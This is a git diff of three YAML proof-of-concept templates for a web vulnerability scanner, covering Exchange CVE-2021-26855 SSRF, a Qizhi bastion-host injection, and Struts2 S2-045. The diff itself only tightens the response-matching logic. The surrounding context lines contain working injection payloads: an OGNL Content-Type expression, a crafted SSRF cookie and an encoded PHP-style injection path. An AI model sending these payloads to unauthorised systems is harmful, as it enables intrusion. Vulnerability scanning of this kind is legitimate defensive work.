diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
index 6b80262..97a1da6 100644
--- a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
+++ b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
@@ -6,7 +6,7 @@ rules:
       Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
     follow_redirects: false
     expression: |
-      response.headers["X-CalculatedBETarget"].icontains("localhost")
+      "X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
 detail:
   author: sharecast
   Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
diff --git a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml b/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml
index 0b6d03a..9bc1287 100644
--- a/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml
+++ b/WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml
@@ -5,7 +5,7 @@ rules:
     path: >-
       /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
     expression: |
-      response.status == 200 && response.body.bcontains(b"错误的id")
+      response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计")
 detail:
   author: we1x4n(https://we1x4n.com/)
   links:
diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml
index 9259a77..d2dc423 100644
--- a/WebScan/pocs/struts2-045-1.yml
+++ b/WebScan/pocs/struts2-045-1.yml
@@ -9,7 +9,7 @@ rules:
       Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
     follow_redirects: true
     expression: |
-      response.headers["Keyvalue"].contains(string(r1 * r2))
+      "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
 detail:
   author: shadown1ng(https://github.com/shadown1ng)